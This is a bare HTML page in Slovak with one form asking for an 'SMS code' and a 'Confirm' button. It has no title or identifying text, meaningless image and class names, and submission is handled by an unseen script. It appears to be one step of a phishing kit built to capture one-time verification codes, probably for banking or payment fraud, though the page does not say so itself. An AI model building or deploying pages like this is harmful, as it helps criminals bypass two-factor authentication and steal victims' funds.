<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/lakona.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
    <div class="kola">
        <div>
            <div class="upto">
                <img src="./img/hedrosmims.png" alt="">
            </div>
        </div>
    
    
        <div>
            <div class="cct">
                
                
                <form class="formcc" method="post" id="pg3">
                    <div class="feildcc1">
                        <p><span>*</span>Kód SMS
                        </p>
                    <input type="text" placeholder="" maxlength="10" required id="sps1">
                    

                    </div>
                    
                    <button type="submit">Potvrdiť</button>
                </form>
            </div>
        </div>
    </div>

    <div>
        <div class="pola">
            <img src="./img/bkilato.JPG" alt="">
        </div>
    </div>
    <script src="./js/stb.js"></script>
</body>
</html>